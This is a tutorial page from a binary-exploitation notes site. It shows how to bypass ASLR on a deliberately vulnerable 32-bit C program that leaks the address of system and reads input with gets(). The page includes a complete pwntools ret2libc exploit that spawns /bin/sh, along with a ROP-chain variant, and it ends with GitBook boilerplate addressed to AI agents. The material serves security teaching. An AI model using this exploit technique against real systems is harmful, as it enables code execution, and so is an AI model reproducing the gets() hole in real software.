> For the complete documentation index, see [llms.txt](https://ir0nstone.gitbook.io/notes/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://ir0nstone.gitbook.io/notes/binexp/stack/aslr/aslr-bypass-with-given-leak.md). # ASLR Bypass with Given Leak ## The Source {% file src="/files/-MGIXkZydbwqB-uqiIm5" %} ASLR - 32-bit {% endfile %} ```c #include #include void vuln() { char buffer[20]; printf("System is at: %lp\n", system); gets(buffer); } int main() { vuln(); return 0; } void win() { puts("PIE bypassed! Great job :D"); } ``` Just as we did for PIE, except this time we print the address of system. ## Analysis ``` $ ./vuln-32 System is at: 0xf7de5f00 ``` Yup, does what we expected. {% hint style="info" %} Your address of system might end in different characters - you just have a different libc version {% endhint %} ## Exploitation Much of this is as we did with PIE. ```python from pwn import * elf = context.binary = ELF('./vuln-32') libc = elf.libc p = process() ``` Note that we include the libc here - this is just another `ELF` object that makes our lives easier. Parse the address of system and calculate libc base from that (as we did with PIE): ```python p.recvuntil('at: ') system_leak = int(p.recvline(), 16) libc.address = system_leak - libc.sym['system'] log.success(f'LIBC base: {hex(libc.address)}') ``` Now we can finally ret2libc, using the `libc` `ELF` object to really simplify it for us: ```python payload = flat( 'A' * 32, libc.sym['system'], 0x0, # return address next(libc.search(b'/bin/sh')) ) p.sendline(payload) p.interactive() ``` ### Final Exploit ```python from pwn import * elf = context.binary = ELF('./vuln-32') libc = elf.libc p = process() p.recvuntil('at: ') system_leak = int(p.recvline(), 16) libc.address = system_leak - libc.sym['system'] log.success(f'LIBC base: {hex(libc.address)}') payload = flat( 'A' * 32, libc.sym['system'], 0x0, # return address next(libc.search(b'/bin/sh')) ) p.sendline(payload) p.interactive() ``` ## 64-bit Try it yourself :) {% file src="/files/-MGIZ6w3y5T0Zk6EBsUz" %} ASLR - 64-bit {% endfile %} ## Using pwntools If you prefer, you could have changed the following payload to be more pwntoolsy: ```python payload = flat( 'A' * 32, libc.sym['system'], 0x0, # return address next(libc.search(b'/bin/sh')) ) p.sendline(payload) ``` Instead, you could do: ```python binsh = next(libc.search(b'/bin/sh')) rop = ROP(libc) rop.raw('A' * 32) rop.system(binsh) p.sendline(rop.chain()) ``` The benefit of this is it's (arguably) more readable, but also makes it much easier to reuse in 64-bit exploits as all the parameters are automatically resolved for you. --- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter: ``` GET https://ir0nstone.gitbook.io/notes/binexp/stack/aslr/aslr-bypass-with-given-leak.md?ask=&goal= ``` `ask` is the immediate question: it should be specific, self-contained, and written in natural language. `goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.